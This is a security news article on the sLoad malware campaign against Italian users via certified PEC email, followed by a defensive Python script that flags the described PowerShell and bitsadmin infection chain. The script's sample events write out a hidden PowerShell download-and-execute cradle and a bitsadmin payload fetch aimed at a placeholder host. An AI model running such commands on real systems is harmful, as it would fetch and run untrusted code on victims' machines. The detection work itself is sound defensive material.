October 7, 2019 By David Bisson 2 min read

Attackers are leveraging certified emails to target Italian users with samples of the sLoad malware family.

According to Cybaze-Yoroi ZLAB, the sLoad campaign began when criminals used certified emails to target Italian organizations and consultants affiliated with professional associations. Known as posta elettronica certificata (PEC) in Italy, certified emails are essentially normal email messages that come with an added guarantee of the sender’s identity. This verification lulled recipients into a false sense of security and tricked them into opening the attached .ZIP file.

Once opened, the .ZIP archive, unlike those used in previous campaigns, didn’t hide PowerShell code. Instead, it contained a corrupted PDF document and a VBS script. The PDF served as a decoy, meant to convince the recipient that nothing was wrong so that they would go on to run the script. If they did, the script launched a PowerShell script retrieved from the attackers’ infrastructure, which in turn used bitsadmin.exe to download a malicious .JPG file. Using bitsadmin.exe for the download helped the campaign evade detection by AV tools, while the image file loaded yet another PowerShell script that established persistence on the infected machine and ran a series of further commands to download the final payload.

A Wave of Attacks Exploiting Posta Elettronica Certificata (PEC)

The sLoad operation isn’t the first attack campaign to involve certified email in some way. In January 2017, My Online Security detected a malspam campaign that used “posta certifica” in the subject line and body of its attack emails. Approximately two years later, researchers at ESET observed DanaBot combing through victims’ inboxes for emails specifically containing the substring “pec,” presumably in an effort to target corporate and public administration emails. Then, in April 2019, Cisco Talos discovered attackers pairing PEC with the JasperLoader downloader to target Italians with the Gootkit banking Trojan.

Help Defend Against sLoad Malware

Security professionals can help their organizations defend against sLoad by moving systems away from a model of escalated privilege access and toward one of least privilege through access management, multifactor authentication (MFA) and other security controls. Employee security awareness training, along with sophisticated security information and event management (SIEM) tools, can help organizations detect and defend against PowerShell attacks.
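As an added illustration of the SIEM-style detection mentioned here, applied to the infection chain described earlier (a script host launching PowerShell, then bitsadmin.exe fetching an image-named file), the following Python is not from the original article or from Cybaze-Yoroi ZLAB. It runs a few process-creation rules over constructed sample events; the field names, paths and URLs are assumptions shaped after a simplified Sysmon process-creation record, and `example.invalid` is a placeholder, not an indicator from the campaign.

```python
"""Flag process-creation events matching the sLoad-style chain described above:
script host -> PowerShell download cradle -> bitsadmin.exe fetching an image-named file.
Added example; the events below are constructed, not taken from the campaign."""
from __future__ import annotations
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}   # hosts for VBS/JS stages
SHELLS = {"powershell.exe", "pwsh.exe"}
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

# Traits commonly seen in PowerShell download cradles; any two together are suspicious.
CRADLE_PATTERNS = [
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
    re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
]
URL_RE = re.compile(r"https?://\S+", re.I)

# Constructed sample events (assumed shape: parent image, image, command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage1.ps1')\""},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin.exe /transfer job1 /download /priority high "
                r"http://example.invalid/img.jpg C:\Users\Public\img.jpg"},
    {"parent": r"C:\Windows\explorer.exe",            # benign: admin listing BITS jobs
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin.exe /list"},
    {"parent": r"C:\Windows\explorer.exe",            # benign: local maintenance script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event: dict) -> list[str]:
    """Return the detection names an event matches (empty list when nothing fires)."""
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = event["cmdline"]
    hits: list[str] = []

    # Rule 1: a script host (the VBS stage) spawning PowerShell.
    if parent in SCRIPT_HOSTS and image in SHELLS:
        hits.append("script_host_spawns_powershell")

    # Rule 2: PowerShell command line with at least two download-cradle traits.
    if image in SHELLS and sum(bool(p.search(cmd)) for p in CRADLE_PATTERNS) >= 2:
        hits.append("powershell_download_cradle")

    # Rule 3: bitsadmin.exe transferring a file on behalf of a scripting parent.
    if image == "bitsadmin.exe" and re.search(r"/transfer|/download|/addfile", cmd, re.I):
        if parent in SHELLS | SCRIPT_HOSTS:
            hits.append("bitsadmin_download_from_script")
        # Rule 3b: the remote file is named like an image (sLoad carried code in a .JPG).
        for url in URL_RE.findall(cmd):
            if url.lower().rstrip("\"'").endswith(IMAGE_EXTENSIONS):
                hits.append("bitsadmin_fetches_image_named_file")
                break
    return hits


def scan(events: list[dict]) -> list[tuple[int, str]]:
    """Run classify_event over a list of events and return (index, detection) pairs."""
    return [(i, name) for i, ev in enumerate(events) for name in classify_event(ev)]


if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Rule 1 and Rule 3 key on parent-child relationships rather than on command-line strings, so they survive trivial renaming of scripts and URLs; Rule 2 deliberately requires two cradle traits so that a lone `-ep bypass` in a legitimate admin script does not page anyone. In a real SIEM the same logic would be expressed as a correlation over Sysmon Event ID 1 (or the EDR equivalent) with the parent image and command line fields.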
